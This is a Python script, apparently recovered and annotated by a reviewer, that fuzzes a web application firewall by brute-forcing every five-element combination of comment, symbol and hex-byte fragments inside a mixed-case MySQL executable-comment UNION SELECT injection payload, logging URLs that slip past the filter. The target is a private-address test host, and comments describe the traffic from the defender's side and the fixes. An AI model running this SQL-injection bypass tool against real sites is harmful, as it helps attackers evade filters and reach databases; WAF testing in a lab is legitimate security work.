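#encoding=utf-8
# WAF rule-coverage fuzzer for a single test endpoint.
#
# Builds every 5-element combination of the fuzz dictionary, places it between
# the keywords of a mixed-case `uNion ... seLect` wrapped in a MySQL `/*! ... */`
# executable comment, appends it to the `a` query parameter and records the
# URLs whose response still contains the expected marker string.
#
# What this looks like from the defending side: a burst of GET requests from
# one client, all with the same User-Agent, whose query strings contain
# `/*!uNion` ... `seLect*/`. Total request count is len(FUZZ) ** 5.
# A URL that lands in result.txt marks a gap in the filter's keyword matching;
# matching after comment and case normalisation closes that class of gap, and
# parameterising the query behind the endpoint removes the dependency on the
# filter altogether.
#
# NOTE(review): the listing this was recovered from had lost its indentation.
# The author's comment describes combining dictionary entries with for-loops,
# so the five loops are treated as fully nested - confirm against the original.
import itertools
import random

import requests

# Target is a host on a private (RFC 1918) address.
url = "http://192.168.235.133/2.php?a=1"

Fuzz_a = ['/*!14450','*/','/**/','/','-','+']
#Fuzz_a = ['']
Fuzz_b = ['']
#Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']

# One dictionary entry per line; only the trailing newline is stripped.
# The context manager closes the wordlist, which the original never did.
with open('HexValsAllBytes.txt','r') as wordlist:
    Fuzz_c = [line.strip('\n') for line in wordlist]

FUZZ = Fuzz_a+Fuzz_b+Fuzz_c  # assemble the fuzz dictionary
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}  # request headers

# itertools.product advances the rightmost element fastest, which is the same
# order as five nested loops with `a` outermost and `e` innermost.
for a, b, c, d, e in itertools.product(FUZZ, repeat=5):
    PYLOAD = "/*!uNion"+a+b+c+d+e+"seLect*/1,3333"
    urlp = url+PYLOAD
    #print(urlp)
    res = requests.get(urlp,headers=header)
    #print(res.text)
    # Author's note: this marker must be changed to a string that is always
    # present in the normal (unblocked) page of the endpoint under test.
    if '1xiaobai13333' in res.text:
        print ("[*]URL:"+ urlp +"BYPASS!")
        # The original ended with `f.close` (no call), so the handle was never
        # closed explicitly; `with` closes and flushes it on every hit.
        with open('result.txt','a') as f:
            f.write(urlp+"\n")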